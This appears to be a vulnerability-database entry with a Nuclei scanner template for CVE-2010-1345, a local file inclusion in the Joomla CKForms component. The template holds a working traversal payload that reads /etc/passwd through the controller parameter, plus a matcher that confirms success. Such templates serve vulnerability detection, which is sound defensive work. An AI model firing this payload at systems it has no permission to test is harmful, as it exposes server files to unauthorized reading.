Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1345
HistoryAug 21, 2021 - 12:06 a.m.

Joomla! Component Cookex Agency CKForms - Local File Inclusion

2021-08-2100:06:07
ProjectDiscovery
github.com
5

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.6 Medium

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

75.9%

A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1345

info:
  name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/15453
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1345
    - http://www.exploit-db.com/exploits/11785
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1345
    cwe-id: CWE-22
    epss-score: 0.00477
    epss-percentile: 0.75244
    cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cookex
    product: com_ckforms
  tags: cve2010,cve,lfi,edb,joomla,cookex

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402203d0345bc171d83b4201aa878f8a267915ce9379a6fcc88c609476ecc452ecc4f02200bfc25daa3c0bb029d6639d3a22eba998fce947d379499b47a17083afbb0c816:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.6 Medium

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

75.9%